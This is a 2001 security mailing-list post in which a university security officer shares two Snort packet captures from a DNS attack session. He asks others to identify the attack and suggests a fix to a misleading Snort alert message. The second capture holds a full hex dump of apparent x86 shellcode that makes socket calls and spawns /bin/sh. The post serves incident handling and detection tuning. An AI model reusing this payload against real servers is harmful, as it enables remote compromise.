I'm posting this to both incidents and snort-users -- aplogies to those who see this twice. Here are a couple of packet dumps captured by snort from a single dns session. The second represents what looks like shell code and triggers the 'RPC EXPLOIT statdx' alert in snort. Perhaps the snort rule alert message should be changed to be less specific or another rule added that is specifc to port 53 with an approriate message. Does anyone recognise this attack? Cheers, Russell. [**] DNS named iquery attempt [**] 11/24-00:51:18.968347 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0x1FB 209.235.8.118:2072 -> 130.216.191.6:53 UDP TTL:43 TOS:0x0 ID:11539 IpLen:20 DgmLen:493 Len: 473 2F A6 09 80 00 00 00 01 00 00 00 00 3E 41 41 41 /...........>AAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 41 41 41 41 41 41 41 41 41 41 41 3E 42 42 42 42 AAAAAAAAAAA>BBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 3E 43 43 43 43 43 BBBBBBBBBB>CCCCC 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC 43 43 43 43 43 43 43 43 43 3E 00 01 02 03 04 05 CCCCCCCCC>...... 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 ................ 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 .......... !"#$% 26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 32 33 34 35 &'()*+,-./012345 36 37 38 39 3A 3B 3C 3D 3E 45 45 45 45 45 45 45 6789:;<=>EEEEEEE 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 EEEEEEEEEEEEEEEE 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 EEEEEEEEEEEEEEEE 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 45 EEEEEEEEEEEEEEEE 45 45 45 45 45 45 45 3E 46 46 46 46 46 46 46 46 EEEEEEE>FFFFFFFF 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 FFFFFFFFFFFFFFFF 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 FFFFFFFFFFFFFFFF 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 FFFFFFFFFFFFFFFF 46 46 46 46 46 46 3D 47 47 47 47 47 47 47 47 47 FFFFFF=GGGGGGGGG 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 GGGGGGGGGGGGGGGG 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 GGGGGGGGGGGGGGGG 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 47 GGGGGGGGGGGGGGGG 47 47 47 47 00 00 01 00 01 00 00 00 01 00 FF 40 GGGG...........@ 66 f =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ [**] RPC EXPLOIT statdx [**] 11/24-00:51:19.186260 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0x228 209.235.8.118:2072 -> 130.216.191.6:53 UDP TTL:43 TOS:0x0 ID:11543 IpLen:20 DgmLen:538 Len: 518 2F A6 00 00 00 01 00 00 00 00 00 01 3C 90 89 E6 /...........<... 83 C6 40 C7 06 02 00 0B AC C7 46 04 97 C4 47 A0 ..@.......F...G. 31 C0 89 46 08 89 46 0C 31 C0 89 46 28 40 89 46 1..F..F.1..F(@.F 24 40 89 46 20 8D 4E 20 31 DB 43 31 C0 83 C0 66 $@.F .N 1.C1...f 51 53 50 CD 80 89 46 20 90 3C 90 8D 06 89 46 24 QSP...F .<....F$ 31 C0 83 C0 10 89 46 28 58 5B 59 43 43 FF 76 20 1.....F(X[YCC.v CD 80 5B 4F 74 32 8B 04 24 89 46 08 90 BD D1 EB ..[Ot2..$.F..... 08 76 89 6E 04 C7 06 03 80 35 86 B8 04 00 00 00 .v.n.....5...... 8D 0E 31 D2 83 C2 0C CD 80 C7 06 02 00 61 A9 89 ..1..........a.. 6E 04 90 31 FF 47 EB 88 90 31 C0 83 C0 3F 31 C9 n..1.G...1...?1. 50 CD 80 58 41 CD 80 C7 06 2F 62 69 6E C7 46 04 P..XA..../bin.F. 2F 73 68 00 89 F0 83 C0 08 89 46 08 31 C0 89 46 /sh.......F.1..F 0C B0 0B 8D 56 0C 8D 4E 08 89 F3 CD 80 31 C0 40 ....V..N.....1.@ CD 80 3E 41 41 41 41 41 41 41 41 41 41 41 41 41 ..>AAAAAAAAAAAAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 41 3E 42 42 42 42 42 42 42 42 42 42 42 42 42 42 A>BBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 03 43 43 43 10 06 00 00 00 B7 FD FF FF E3 FF FF .CCC............ FF 00 FF FF FF 3E 41 41 41 41 41 41 41 41 41 41 .....>AAAAAAAAAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 41 41 41 41 3E 42 42 42 42 42 42 42 42 42 42 42 AAAA>BBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 10 43 43 43 43 43 43 43 43 43 43 43 43 BBB.CCCCCCCCCCCC 43 43 43 43 00 00 01 00 01 00 00 FA 00 FF CCCC.......... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ Russell Fulton, Computer and Network Security Officer The University of Auckland, New Zealand ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Sun Nov 25 2001 - 14:41:10 PST